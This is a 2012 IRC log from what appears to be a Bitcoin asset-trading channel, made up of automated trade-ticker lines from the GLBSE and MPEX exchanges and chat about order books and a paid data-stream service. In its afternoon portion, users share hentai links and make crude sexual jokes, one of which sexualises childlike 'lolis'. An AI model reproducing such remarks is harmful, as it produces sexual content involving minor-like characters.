linked and dont have it now Aug 26 14:52:32 I can find it Aug 26 14:52:37 Just hoping you had a link handy hehe Aug 26 14:53:39 actually i'll post in a sec Aug 26 14:56:03 i hope you keep my name out of it Aug 26 14:56:13 i dont know what you are doing but i get enough shit the way it is Aug 26 14:56:17 Wow that took a lot longer than I thought lol there's a user named Maged_is_a_Douche Aug 26 14:56:32 People look up to you Aug 26 14:56:33 lol Aug 26 14:56:44 But I'm not going to quote you since it's not your quote anyway Aug 26 14:56:55 maged posted irc logs Aug 26 14:58:58 hmm nothing for the past 3 days tho :/ Aug 26 15:00:20 [GLBSE] [ZETA-MINING] 6 @ 0.16 = 0.96 BTC [-] Aug 26 15:02:10 yup Aug 26 15:02:40 wanta buy my btcstaccount for 40k? :) Aug 26 15:07:27 [MPEX] [S.DICE] 248000 @ 0.003375 = 837 BTC [-] Aug 26 15:11:06 [GLBSE] [GIGAMINING] 4 @ 0.97599 = 3.904 BTC [-] Aug 26 15:11:16 Wow that took a lot longer than I thought Aug 26 15:11:18 [GLBSE] [MMM] 2 @ 0.8 = 1.6 BTC [+] Aug 26 15:11:23 pirate news from aug. 19th to 23rd collected at: http://www.tsukino.ca/cpa/nyan/nyancat-statements/2012-34-nyan-statement/ Aug 26 15:12:37 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 26 15:15:40 Serena? Aug 26 15:15:55 He has identity crisis problems xD Aug 26 15:16:57 i dont know what you are doing but i get enough shit the way it is << poor goat. Aug 26 15:17:30 [GLBSE] [OBSI.HRPT] 6 @ 0.102 = 0.612 BTC [+] Aug 26 15:18:30 [MPEX] [S.MPOE] 44586 @ 0.00038513 = 17.1714 BTC [+] Aug 26 15:18:31 [MPEX] [S.MPOE] 442 @ 0.00038531 = 0.1703 BTC [+] Aug 26 15:18:50 Serena is my english name Aug 26 15:19:00 you;re a girl ?! Aug 26 15:19:06 usagi is a Japanese name. It's to fit in better :p Aug 26 15:19:51 [GLBSE] [GSDPT] 10000 @ 0.0034 = 34 BTC [+] Aug 26 15:20:01 it's from salor moon ^^ Aug 26 15:20:12 No it isn't Aug 26 15:20:29 It's a popular Japanese name. For example there's a hotel named that, and a singer Aug 26 15:20:38 is there porn of it ? Aug 26 15:20:50 You just think it's from sailor moon because that's the most poular export culture Aug 26 15:20:57 but Usagi tsuknio is from salot moon ^^ Aug 26 15:21:09 There's also a popular legend about someone named this Aug 26 15:21:14 No, it isn't , DT Aug 26 15:21:27 The character in sailor moon just happens to use that name Aug 26 15:21:35 she knows what she is talking about, oh snap! :) Aug 26 15:21:38 http://4.bp.blogspot.com/-TWwBavSI-Uk/Ta6NQN8k3OI/AAAAAAAAARs/naUUYMmPTWo/s1600/sailor-moon-hentai-naked1.jpg o hey what do you know, there IS porn of it. Aug 26 15:21:51 yea yea xD Aug 26 15:22:01 There's unofficial hentai for everything Aug 26 15:22:21 Wow that's incredibly poorly drawn Aug 26 15:22:22 it's funny : not only they hjave the exact same noses mouths eyebrows ertc Aug 26 15:22:26 they also have the exact same cunts. Aug 26 15:22:27 yeah Aug 26 15:22:32 send me some unofficail hentai please:) Aug 26 15:23:30 [GLBSE] [OBSI.HRPT] 100 @ 0.10000004 = 10 BTC [-] Aug 26 15:23:42 [GLBSE] [OBSI.HRPT] 380 @ 0.102 = 38.76 BTC [+] Aug 26 15:23:58 http://www.youtube.com/watch?v=fNoErP-gxBQ Aug 26 15:24:24 [GLBSE] [OBSI.HRPT] 24 @ 0.102 = 2.448 BTC [+] Aug 26 15:24:34 The entire series is a rip off of Magical Angel Creamy Mami, which created the magical girl series Aug 26 15:25:21 actually it;'s not so badly drawn. there's way worse http://i34.tinypic.com/2w7g2go.jpg Aug 26 15:25:26 MACM was actually pretty popular back in the day, it's the magical girl series for those around 40 now, whereas sailor moon is more popular with 20-40 year olds now, and todays youth watch pretty cure and others, i think Aug 26 15:26:00 lol is he carrying a 40 in a brown paper bag? Aug 26 15:26:09 im seen some jap cartoon porn, crazy shit some times., with monsters and giant squid Aug 26 15:26:09 i have no ideea lol Aug 26 15:26:26 Chaang-Noi that's not porn, that's video surveillance from japan. Aug 26 15:28:12 iv been to japan, but iv never seen that Aug 26 15:28:29 would be fun to watch a giant squid fuck 5 lolis at once... Aug 26 15:32:01 it's a problem of supply and demand : lolis you'd find Aug 26 15:32:06 but the squid are exhausted. Aug 26 15:33:20 http://tentaclegrape.com/ Aug 26 15:36:34 mpex is blocked in China Aug 26 15:36:51 at least where I am Aug 26 15:36:59 mircea_popescu: who did you piss off? Aug 26 15:37:18 nefario well i dunno. possibly cause you boys are not allowed to see 4chan ? Aug 26 15:37:30 or else, i link to google docs thus being politically dubious. Aug 26 15:38:07 did this just happen ? Aug 26 15:38:22 mircea_popescu: ^^ bots back, wzg back up Aug 26 15:38:26 ty! Aug 26 15:38:33 o/ np Aug 26 15:38:40 [GLBSE] [GIGAMINING] 5 @ 0.97599 = 4.88 BTC [-] Aug 26 15:39:03 i never know if o/ is a kick in the balls or someone raising his arm to smack me over the head Aug 26 15:40:29 https://www.youtube.com/watch?v=LWaKSzhvc_I Aug 26 15:41:08 lol mircea_popescu - o/ is waving Aug 26 15:41:15 :p Aug 26 15:41:19 you could at least wave back \o Aug 26 15:41:27 or o/\o hivife Aug 26 15:42:18 MrTiggr þ Aug 26 15:42:38 :P Aug 26 15:42:53 hehe Aug 26 15:43:04 [GLBSE] [BFLS] 2 @ 0.7 = 1.4 BTC [-] Aug 26 15:45:36 [GLBSE] [OBSI.HRPT] 4 @ 0.102 = 0.408 BTC [+] Aug 26 15:46:13 [MPEX] [S.MPOE] 16500 @ 0.00038364 = 6.3301 BTC [-] Aug 26 15:46:38 [GLBSE] [ASICMINER] 5 @ 0.089799 = 0.449 BTC [+] Aug 26 15:47:03 [GLBSE] [ASICMINER] 1 @ 0.089799 BTC [+] Aug 26 15:54:32 [GLBSE] [NASTY] 1 @ 0.56 BTC [+] Aug 26 15:56:30 [GLBSE] [BITBOND] 6 @ 0.4011 = 2.4066 BTC [-] Aug 26 15:56:31 [GLBSE] [BITBOND] 5 @ 0.401 = 2.005 BTC [-] Aug 26 15:56:32 [GLBSE] [BITBOND] 500 @ 0.4 = 200 BTC [-] Aug 26 15:58:01 [GLBSE] [OBSI.HRPT] 3 @ 0.102 = 0.306 BTC [+] Aug 26 16:01:56 haa haa haa goats on a boat Aug 26 16:02:11 that was quite hilarious :P Aug 26 16:02:33 [GLBSE] [OBSI.HRPT] 2 @ 0.102 = 0.204 BTC [+] Aug 26 16:02:43 wtf thats real Aug 26 16:02:59 no it's a parody trailer thing :P Aug 26 16:04:50 :) Aug 26 16:05:15 I mean someone else made it besides one of us Aug 26 16:07:58 yea Aug 26 16:13:09 Diablo-D3: I use it when wandering my house to stay on IRC and stuff Aug 26 16:17:39 i did not make that video, lol:) **** ENDING LOGGING AT Sun Aug 26 16:19:09 2012 **** BEGIN LOGGING AT Sun Aug 26 18:56:50 2012 Aug 26 18:58:36 [MPEX] [F.GIGA.ETF] 3205 @ 0.00102941 = 3.2993 BTC [+] Aug 26 18:58:38 [MPEX] [F.GIGA.ETF] 3495 @ 0.00103072 = 3.6024 BTC [+] Aug 26 19:00:39 [MPEX] [S.MPOE] 31590 @ 0.0003835 = 12.1148 BTC [-] Aug 26 19:00:40 [MPEX] [S.MPOE] 401 @ 0.00038175 = 0.1531 BTC [-] Aug 26 19:00:42 [MPEX] [S.MPOE] 153 @ 0.0003816 = 0.0584 BTC [-] Aug 26 19:01:45 [MPEX] [F.GIGA.ETF] 7460 @ 0.00102009 = 7.6099 BTC [-] Aug 26 19:01:47 [MPEX] [F.GIGA.ETF] 6400 @ 0.00101707 = 6.5092 BTC [-] Aug 26 19:01:48 [MPEX] [F.GIGA.ETF] 17400 @ 0.00101668 = 17.6902 BTC [-] Aug 26 19:01:49 [MPEX] [F.GIGA.ETF] 5211 @ 0.00101192 = 5.2731 BTC [-] Aug 26 19:01:49 [MPEX] [F.GIGA.ETF] 5983 @ 0.00100427 = 6.0085 BTC [-] Aug 26 19:01:50 [MPEX] [F.GIGA.ETF] 10800 @ 0.00100218 = 10.8235 BTC [-] Aug 26 19:01:51 [MPEX] [F.GIGA.ETF] 1746 @ 0.00098625 = 1.722 BTC [-] Aug 26 19:02:03 [MPEX] [F.GIGA.ETF] 11254 @ 0.00098625 = 11.0993 BTC [-] Aug 26 19:02:05 [MPEX] [F.GIGA.ETF] 8737 @ 0.00097147 = 8.4877 BTC [-] Aug 26 19:02:06 [MPEX] [F.GIGA.ETF] 4648 @ 0.00097114 = 4.5139 BTC [-] Aug 26 19:02:07 [MPEX] [F.GIGA.ETF] 8500 @ 0.00097102 = 8.2537 BTC [-] Aug 26 19:02:31 [MPEX] [S.MPOE] 1100 @ 0.0003816 = 0.4198 BTC [-] Aug 26 19:03:46 [MPEX] [S.BVPS] 150 @ 0.0035514 = 0.5327 BTC [-] Aug 26 19:08:11 [MPEX] [S.MPOE] 35486 @ 0.0003816 = 13.5415 BTC [-] Aug 26 19:09:03 [MPEX] [S.MPOE] 13914 @ 0.00038128 = 5.3051 BTC [-] Aug 26 19:09:04 [MPEX] [S.MPOE] 34286 @ 0.00038531 = 13.2107 BTC [+] Aug 26 19:09:50 [GLBSE] [PIMP] 20 @ 0.1699 = 3.398 BTC [-] Aug 26 19:09:52 [GLBSE] [PIMP] 19 @ 0.17 = 3.23 BTC [+] Aug 26 19:15:31 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [+] Aug 26 19:15:33 [GLBSE] [PUREMINING] 6 @ 0.0799 = 0.4794 BTC [+] Aug 26 19:24:59 [GLBSE] [PUREMINING] 1 @ 0.0799 BTC [+] Aug 26 19:28:04 [GLBSE] [COGNITIVE] 4 @ 0.6898 = 2.7592 BTC [-] Aug 26 19:28:15 [GLBSE] [FDBF] 1 @ 0.133 BTC Aug 26 19:28:52 hmmm Aug 26 19:28:55 only showing one entry Aug 26 19:31:02 [GLBSE] [FDBF] 5 @ 0.131 = 0.655 BTC [-] Aug 26 19:31:04 [GLBSE] [FDBF] 100 @ 0.13 = 13 BTC [-] Aug 26 19:31:05 [GLBSE] [FDBF] 200 @ 0.13 = 26 BTC [-] Aug 26 19:31:06 [GLBSE] [FDBF] 1 @ 0.13 BTC [-] Aug 26 19:32:53 [GLBSE] [FPGAMINING] 1 @ 0.9 BTC [+] Aug 26 19:33:21 [GLBSE] [FPGAMINING] 4 @ 0.9299 = 3.7196 BTC [+] Aug 26 19:37:59 [MPEX] [S.MPOE] 35300 @ 0.0003801 = 13.4175 BTC [-] Aug 26 19:38:00 [MPEX] [S.MPOE] 15800 @ 0.00038002 = 6.0043 BTC [-] Aug 26 19:38:01 [MPEX] [S.MPOE] 915 @ 0.00037952 = 0.3473 BTC [-] Aug 26 19:39:42 [GLBSE] [ASICMINER] 10 @ 0.085 = 0.85 BTC [+] Aug 26 19:40:08 [GLBSE] [TEEK.USD] 34 @ 0.07 = 2.38 BTC [-] Aug 26 19:40:08 [GLBSE] [TEEK.USD] 65 @ 0.0799 = 5.1935 BTC [+] Aug 26 19:40:10 [GLBSE] [TEEK.USD] 2 @ 0.08 = 0.16 BTC [+] Aug 26 19:40:11 [GLBSE] [TEEK.USD] 14 @ 0.08999 = 1.2599 BTC [+] Aug 26 19:52:48 [MPEX] [S.DICE] 30150 @ 0.0034 = 102.51 BTC [+] Aug 26 19:55:52 current backing for GSDPT Shares sold: 268139 Backing Held:278008 S.DICE shares :) Aug 26 19:56:03 I guess I can chill a bit with the purchasing of backing. Aug 26 19:56:55 looks like you're ahead. Aug 26 19:57:13 [GLBSE] [TEEK.A] 22 @ 0.90999 = 20.0198 BTC [-] Aug 26 19:57:28 yea I threw in some of my own BTC :) Aug 26 19:58:01 o so you own like 10k shares of gsdpt ? Aug 26 19:58:17 I own 10k shares of S.DICE Aug 26 19:58:34 remeber I calcualted something wrong so I had to throw in 20 of my own BTC into it. Aug 26 19:58:48 it will balance it self out sooner or later :) Aug 26 19:59:24 you know how they say, good accounting makes good stocks. Aug 26 20:00:36 [GLBSE] [OBSI.HRPT] 10 @ 0.101 = 1.01 BTC [-] Aug 26 20:00:38 [GLBSE] [OBSI.HRPT] 2 @ 0.1000009 = 0.2 BTC [-] Aug 26 20:00:39 [GLBSE] [OBSI.HRPT] 140 @ 0.10000004 = 14 BTC [-] Aug 26 20:00:39 [GLBSE] [OBSI.HRPT] 250 @ 0.10000003 = 25 BTC [-] Aug 26 20:00:41 [GLBSE] [OBSI.HRPT] 5 @ 0.10000002 = 0.5 BTC [-] Aug 26 20:00:42 [GLBSE] [OBSI.HRPT] 50 @ 0.10000001 = 5 BTC [-] Aug 26 20:00:43 [GLBSE] [OBSI.HRPT] 450 @ 0.10000001 = 45 BTC [-] Aug 26 20:00:44 [GLBSE] [OBSI.HRPT] 3500 @ 0.1 = 350 BTC [-] Aug 26 20:00:45 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [-] Aug 26 20:00:47 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 26 20:00:48 [GLBSE] [OBSI.HRPT] 1000 @ 0.1 = 100 BTC [-] Aug 26 20:01:04 [MPEX] [F.GIGA.ETF] 1200 @ 0.00096532 = 1.1584 BTC [-] Aug 26 20:01:06 [MPEX] [F.GIGA.ETF] 7900 @ 0.00095946 = 7.5797 BTC [-] Aug 26 20:01:06 [MPEX] [F.GIGA.ETF] 1912 @ 0.00095898 = 1.8336 BTC [-] Aug 26 20:05:12 [GLBSE] [NYAN.A] 1 @ 1 BTC [-] Aug 26 20:07:31 [MPEX] [F.GIGA.ETF] 888 @ 0.00095779 = 0.8505 BTC [-] Aug 26 20:07:32 [MPEX] [F.GIGA.ETF] 1612 @ 0.000967 = 1.5588 BTC [+] Aug 26 20:08:58 [GLBSE] [GSDPT] 4000 @ 0.0034 = 13.6 BTC [+] Aug 26 20:10:04 [GLBSE] [ASICMINER] 20 @ 0.08967999 = 1.7936 BTC [+] Aug 26 20:10:38 [GLBSE] [OBSI.HRPT] 57 @ 0.1 = 5.7 BTC [-] Aug 26 20:13:05 [GLBSE] [ASICMINER] 9 @ 0.08977999 = 0.808 BTC [+] Aug 26 20:13:20 [GLBSE] [ASICMINER] 7 @ 0.08977999 = 0.6285 BTC [+] Aug 26 20:13:49 [GLBSE] [OBSI.HRPT] 3 @ 0.1 = 0.3 BTC [-] Aug 26 20:13:54 [GLBSE] [GSDPT] 40 @ 0.0034 = 0.136 BTC [+] Aug 26 20:14:25 [MPEX] [S.MPOE] 4488 @ 0.00037952 = 1.7033 BTC [-] Aug 26 20:14:26 [MPEX] [S.MPOE] 14911 @ 0.00037932 = 5.656 BTC [-] Aug 26 20:17:09 [GLBSE] [V.HRL] 4 @ 1 = 4 BTC Aug 26 20:18:10 [GLBSE] [OBSI.HRPT] 300 @ 0.1 = 30 BTC [-] Aug 26 20:18:47 [GLBSE] [OBSI.HRPT] 39 @ 0.1 = 3.9 BTC [-] Aug 26 20:19:52 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 26 20:21:05 [GLBSE] [OBSI.HRPT] 7 @ 0.1 = 0.7 BTC [-] Aug 26 20:23:24 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Aug 26 20:23:37 [GLBSE] [GMVT-BOT] 3 @ 0.189 = 0.567 BTC [+] Aug 26 20:23:38 [GLBSE] [GMVT-BOT] 20 @ 0.199 = 3.98 BTC [+] Aug 26 20:23:39 [GLBSE] [GMVT-BOT] 5 @ 0.2 = 1 BTC [+] Aug 26 20:23:40 [GLBSE] [GMVT-BOT] 7 @ 0.2099 = 1.4693 BTC [+] Aug 26 20:23:42 [GLBSE] [GMVT-BOT] 3 @ 0.21 = 0.63 BTC [+] Aug 26 20:23:43 [GLBSE] [GMVT-BOT] 10 @ 0.23 = 2.3 BTC [+] Aug 26 20:23:44 [GLBSE] [GMVT-BOT] 1 @ 0.24999999 BTC [+] Aug 26 20:23:45 [GLBSE] [GMVT-BOT] 1 @ 0.25 BTC [+] Aug 26 20:24:29 [MPEX] [F.GIGA.ETF] 249 @ 0.000967 = 0.2408 BTC [+] Aug 26 20:25:47 GMVT-BOT is in a bubble Aug 26 20:25:50 Be careful Aug 26 20:29:36 [GLBSE] [COGNITIVE] 5 @ 0.6501 = 3.2505 BTC [-] Aug 26 20:29:38 [GLBSE] [COGNITIVE] 2 @ 0.65 = 1.3 BTC [-] Aug 26 20:29:45 [GLBSE] [OBSI.HRPT] 250 @ 0.1 = 25 BTC [-] Aug 26 20:31:10 [GLBSE] [PIMP] 40 @ 0.16 = 6.4 BTC [-] Aug 26 20:33:44 [GLBSE] [FPGAMINING] 4 @ 0.92999 = 3.72 BTC [+] Aug 26 20:33:45 [GLBSE] [FPGAMINING] 23 @ 0.93 = 21.39 BTC [+] Aug 26 20:34:43 [MPEX] [F.GIGA.ETF] 11005 @ 0.00103072 = 11.3431 BTC [+] Aug 26 20:34:44 [MPEX] [F.GIGA.ETF] 495 @ 0.00103158 = 0.5106 BTC [+] Aug 26 20:36:35 [GLBSE] [BDK.BND] 495 @ 0.101 = 49.995 BTC [-] Aug 26 20:37:39 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Aug 26 20:38:27 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 26 20:38:33 [GLBSE] [BLUECHIP] 10 @ 0.1 = 1 BTC Aug 26 20:39:14 [GLBSE] [CIUCIU.BOND] 10 @ 0.09999998 = 1 BTC [-] Aug 26 20:39:16 [GLBSE] [CIUCIU.BOND] 240 @ 0.09999999 = 24 BTC [+] Aug 26 20:40:05 [GLBSE] [FUTUREFUND] 50 @ 0.0001195 = 0.006 BTC [+] Aug 26 20:40:49 [GLBSE] [YABMC] 3 @ 0.1279 = 0.3837 BTC [+] Aug 26 20:42:36 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Aug 26 20:44:47 [GLBSE] [YABMC] 19 @ 0.1279 = 2.4301 BTC [+] Aug 26 20:44:49 [GLBSE] [YABMC] 7 @ 0.128 = 0.896 BTC [+] Aug 26 20:44:50 [GLBSE] [YABMC] 3 @ 0.12816 = 0.3845 BTC [+] Aug 26 20:44:51 [GLBSE] [YABMC] 31 @ 0.12827 = 3.9764 BTC [+] Aug 26 20:44:52 [GLBSE] [YABMC] 3 @ 0.12828 = 0.3848 BTC [+] Aug 26 20:44:54 [GLBSE] [YABMC] 7 @ 0.12839 = 0.8987 BTC [+] Aug 26 20:44:55 [GLBSE] [YABMC] 50 @ 0.1285 = 6.425 BTC [+] Aug 26 20:44:55 [GLBSE] [YABMC] 2 @ 0.129199 = 0.2584 BTC [+] Aug 26 20:44:56 [GLBSE] [YABMC] 10 @ 0.1293 = 1.293 BTC [+] Aug 26 20:44:57 [GLBSE] [YABMC] 10 @ 0.1295 = 1.295 BTC [+] Aug 26 20:44:58 [GLBSE] [YABMC] 2 @ 0.1298 = 0.2596 BTC [+] Aug 26 20:44:59 [GLBSE] [YABMC] 20 @ 0.13 = 2.6 BTC [+] Aug 26 20:45:01 [GLBSE] [YABMC] 13 @ 0.13 = 1.69 BTC [+] Aug 26 20:45:39 is yabmc more pirate stuff ? Aug 26 20:45:54 [GLBSE] [YABMC] 23 @ 0.1341 = 3.0843 BTC [+] Aug 26 20:46:57 [GLBSE] [GSDPT] 500 @ 0.0034 = 1.7 BTC [+] Aug 26 20:47:06 no, I think it's a mining company Aug 26 20:47:29 Yet Another Bitcoin Mining Company Aug 26 20:47:32 Mining, bond, I think Aug 26 20:47:41 Turd, according to eskimo :) Aug 26 20:48:16 This turd wants to float, it seems Aug 26 20:48:25 we really need to stop calling them bonds Aug 26 20:49:03 What should them be called? Aug 26 20:49:22 Other than bonds and turds :D Aug 26 20:49:34 special purpose vehicles may fit Aug 26 20:49:48 SPV Aug 26 20:50:00 [GLBSE] [BTC-MINING] 25 @ 0.9998 = 24.995 BTC [+] Aug 26 20:50:29 Nice trademark :) Aug 26 20:51:14 [GLBSE] [CIUCIU.BOND] 208 @ 0.09999999 = 20.8 BTC [+] Aug 26 20:53:39 trademark? Aug 26 20:53:45 .wik spv Aug 26 20:53:47 "Surface photovoltage, a semiconductor characterization technique" - http://en.wikipedia.org/wiki/SPV Aug 26 20:53:51 lol Aug 26 20:53:59 .wik special prupose vehicle Aug 26 20:54:00 "A special purpose entity (SPE; or, especially in Europe, special purpose vehicle/SPV, or, in some cases in each EU jurisdiction – FVC financial vehicle corporation) is a legal entity (usually a limited company of some type or, sometimes, a limited partnership) [...]" - http://en.wikipedia.org/wiki/Special_purpose_entity Aug 26 20:54:54 Special Purpose Underground Vehicle Aug 26 20:54:57 iirc turd works well as it was defined Aug 26 20:55:19 Yeas, seems to work pretty well Aug 26 20:55:38 but the fact that there isn't a maturity, repayment of the principle, etc... bond is entirely misleaing Aug 26 20:55:42 *misleading Aug 26 20:56:26 turd even gets the connotation correct Aug 26 20:56:29 Yes, but bitcoin finance is reinventing everything Aug 26 20:57:23 smickles everything'll end up called a spv Aug 26 20:57:28 name's not descriptive enough Aug 26 20:57:28 i don't think it should mess with the basic definition of a bond tho Aug 26 20:58:21 mircea_popescu: it makes sence to call everything an spv (or similiar) until rigid deffinitions and categories appear Aug 26 20:58:34 maybe, yea. Aug 26 20:58:40 anyway, the MPCD series are real bonds! Aug 26 20:58:56 i believe so Aug 26 20:59:04 and i like 'em Aug 26 21:00:01 patrick was part of constitutes, right? Aug 26 21:00:13 was that operation pirate exposed? Aug 26 21:00:31 [MPEX] [O.BTCUSD.P080N] 8 @ 0.08800824 = 0.7041 BTC [-] Aug 26 21:01:43 they use 500 btc worth of pirate-unexposed patrick debt. Aug 26 21:02:21 so the whole thing is sans-pirate? Aug 26 21:02:31 http://polimedia.us/dtng/c/src/134600336652.png ahaha check this out! Aug 26 21:02:51 well, it's 500 btc of mpoe bonds, 500 of patrick's nonpirate and 100 btc of NYAN.A which i understand is immune due to their tiering. Aug 26 21:03:11 and also insured. Aug 26 21:03:55 i need to free up some btc and calc a value for one of those Aug 26 21:05:46 [MPEX] [F.GIGA.ETF] 1900 @ 0.00098257 = 1.8669 BTC [-] Aug 26 21:08:36 !ticker s.dice Aug 26 21:08:38 [MPEX:S.DICE] 1day: 0.0032 / 0.00332266 / 0.0034 (430610 shares, 1,430.77 BTC), 30day: 0.0032 / 0.00322445 / 0.0034 (2295100 shares, 7,400.44 BTC) Aug 26 21:08:43 oh shit Aug 26 21:08:48 look at https://glbse.com/asset/view/MPOE.ETF Aug 26 21:08:50 the buy side Aug 26 21:09:11 lol ? the haters had shares ? Aug 26 21:09:14 *crickets* Aug 26 21:09:30 last 9@1.4 Aug 26 21:09:32 odd. Aug 26 21:09:42 did the bids just get wiped maybe ? Aug 26 21:10:38 lol GMVT-BOT is in a bubble guys Aug 26 21:10:41 Do not buy Aug 26 21:10:49 !ticker GMVT-BOT Aug 26 21:10:51 [GLBSE:GMVT-BOT] [Bid: 0.1301] [Ask: 0.25] [Spread: 0.1199] [Last: 0.25] [24hVol: 20.67029999] [7dAvg: 0.1415129] Aug 26 21:10:58 AgentKen what's that thing anyway ? the arb bot ? Aug 26 21:11:02 Yep. Aug 26 21:11:50 That bot is DeaDTerra's one? Aug 26 21:11:57 mircea_popescu: the bids must have canceled with the downtime / bug Aug 26 21:12:19 smickles or they got wiped cause they exceeded at some point the person'stotal btc or somesuch Aug 26 21:12:26 they don't seem to have been sold into. Aug 26 21:12:41 Yea, after the bug, all bids were cancelled Aug 26 21:13:57 [GLBSE] [GOLD] 68 @ 0.00989 = 0.6725 BTC [-] Aug 26 21:14:14 ug, still painfully slow Aug 26 21:14:37 [GLBSE] [OBSI.HRPT] 600 @ 0.1 = 60 BTC [-] Aug 26 21:15:09 [GLBSE] [OBSI.HRPT] 89 @ 0.1 = 8.9 BTC [-] Aug 26 21:15:48 [GLBSE] [JAH] 15 @ 0.16 = 2.4 BTC [-] Aug 26 21:16:58 [GLBSE] [OBSI.HRPT] 100 @ 0.1 = 10 BTC [-] Aug 26 21:17:14 [MPEX] [F.GIGA.ETF] 11000 @ 0.0009956 = 10.9516 BTC [+] Aug 26 21:17:31 smickles, GLBSE slow? Aug 26 21:17:44 yeah, for me right now anyway Aug 26 21:17:57 it's the orderbook time Aug 26 21:18:05 er, how long it takes to load Aug 26 21:18:18 we'll be getting a speed boost later this week Aug 26 21:18:25 cool :) Aug 26 21:18:35 wherefrom/how? Aug 26 21:18:36 that guy asking for 20 lol Aug 26 21:19:04 mircea_popescu: i bet that's kakobrekla with the first share Aug 26 21:19:10 lol. Aug 26 21:19:21 it kinda wreaks havoc on the mkt depth graph Aug 26 21:19:22 buy at .1, sell at 20, not a bad plan if it happens Aug 26 21:19:38 ya he'd make more money beggin in a kibbutz. Aug 26 21:19:43 i hear the graphs have improvement coming Aug 26 21:19:53 thats one area Aug 26 21:19:57 [GLBSE] [NYAN.C] 3 @ 0.7 = 2.1 BTC [-] Aug 26 21:19:58 [GLBSE] [NYAN.C] 1 @ 0.7 BTC [-] Aug 26 21:20:01 but we'll be adding live streams of orders Aug 26 21:20:14 like a cnbc ticker? Aug 26 21:20:18 and then we can cache the orderbook over http Aug 26 21:20:53 right now we don't cache the orderbook as it's the only way to get 100% accurate order info Aug 26 21:21:13 oh Aug 26 21:21:16 the http orderbook will be cahced for 10 seconds Aug 26 21:21:23 when we bring up streaming Aug 26 21:21:36 will be using websockets Aug 26 21:21:47 but the service wont be free Aug 26 21:21:50 1 btc a month Aug 26 21:22:01 but Aug 26 21:22:11 orders will go there before they get to twitter Aug 26 21:22:21 giving a significant advantage Aug 26 21:23:21 any questions on streaming smickles? Aug 26 21:24:17 it sounds straightforward to me Aug 26 21:24:34 i don't do engough trading to justify 1 btc a month tho :/ Aug 26 21:24:50 Sounds good Aug 26 21:24:52 hmmm I wonder who would Aug 26 21:25:14 maybe have X slots available, and people bid on slots Aug 26 21:25:39 also a good idea Aug 26 21:25:39 but i unno :P Aug 26 21:25:40 but then Aug 26 21:25:46 [GLBSE] [OBSI.HRPT] 21 @ 0.1 = 2.1 BTC [-] Aug 26 21:25:50 anyone running a bot would jump at that Aug 26 21:25:52 that incentivises us to have fewer slots Aug 26 21:27:23 bidding I mean Aug 26 21:27:37 i understand Aug 26 21:28:15 I meant the 1 btc, I'd pay it if I were running a bot Aug 26 21:28:20 it's a no-brainer Aug 26 21:28:23 i wonder if there is a way to have the auction style payment per month, while not giving you the incentive to create scarcity Aug 26 21:29:56 [GLBSE] [POLY.10.1] 30 @ 1.11512529 = 33.4538 BTC [+] Aug 26 21:30:12 have the number of slots be dynamic... something like 90% of bids are accepted, 10% don't get it Aug 26 21:30:32 *top 90, that is Aug 26 21:30:40 [GLBSE] [POLY.10.1] 30 @ 1.115 = 33.45 BTC [-] Aug 26 21:30:49 how does bidding incentivize scarcity !? Aug 26 21:31:16 [GLBSE] [OBSI.HRPT] 1450 @ 0.1 = 145 BTC [-] Aug 26 21:31:19 if it were no limit on slots, everyone would bid 1 satoshi Aug 26 21:32:56 so ? Aug 26 21:33:44 i believe that nefario has a reason to charge for the service, so such a low price would likely defeate the purpose Aug 26 21:33:45 the point of charging for it in the first place is to induce scarcity right? Aug 26 21:33:52 listen. Aug 26 21:33:56 if the item costs 1 btc Aug 26 21:34:08 and you sell an infinite ammt at 1 satoshi you make a loss of infinite btc Aug 26 21:34:18 [MPEX] [S.MPOE] 20801 @ 0.00037816 = 7.8661 BTC [-] Aug 26 21:34:23 if you sell 3 slots at 10, 6, 2 you make 9 + 5 + 1 = 15 btc Aug 26 21:34:32 if you sell just 1 at 10 you make 9 btc, ie less. Aug 26 21:34:41 so how was scarcity encouraged ? Aug 26 21:35:02 but if there was only 1 slot the bids would probably have been higher Aug 26 21:35:14 than 10 ? why ? Aug 26 21:35:15 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [-] Aug 26 21:35:24 unless it's a bell-curv distro Aug 26 21:35:26 because it's a more scarce commidity being bid for Aug 26 21:35:32 commodity Aug 26 21:35:38 ya but the person bidding doesn't bid on a luxury item Aug 26 21:35:44 his 10 reflects the utility of the item to him. Aug 26 21:36:11 [GLBSE] [KRAKEN] 1 @ 0.01 BTC Aug 26 21:36:14 [GLBSE] [PUREMINING] 3 @ 0.0799 = 0.2397 BTC [+] Aug 26 21:36:34 in this case I think the more people that have access to the data, the less valuable it becomes Aug 26 21:36:47 if it's utility, then it is more likely to be a bellcurve distribution Aug 26 21:37:10 bitfoo from what i hear the value of information increases with access, hence the internet. Aug 26 21:37:39 mircea_popescu, I don't see how that applies to real-time trade data Aug 26 21:37:52 the more real-time you get it, the more potential profit you can make Aug 26 21:37:57 [MPEX] [F.GIGA.ETF] 4151 @ 0.00103158 = 4.2821 BTC [+] Aug 26 21:38:03 and if more people get the data fast, the profits are shared Aug 26 21:38:23 if you all use the same algorithms. Aug 26 21:38:31 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Aug 26 21:39:44 but at any rate i would guess this discussion is moot : trades don't happen fast enough for any of this to matter. Aug 26 21:40:40 that I tend to agree... Aug 26 21:42:19 i mean, it's :42 now. Aug 26 21:42:39 you got the [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] line at 21:38, someone else at 21:37:58 Aug 26 21:42:40 sooo ? Aug 26 21:42:59 lol, yeah Aug 26 21:43:01 ok, Aug 26 21:43:04 but he's going to stream quotes too Aug 26 21:43:15 the mpoe.etf order book is officially awesome in my mind Aug 26 21:43:26 not that 1 btc/month is any big deal in any case, like a newspaper subscription. Aug 26 21:43:49 smickles, nice spread :) Aug 26 21:44:06 !ticker mpoe.etf Aug 26 21:44:10 [GLBSE:MPOE.ETF] 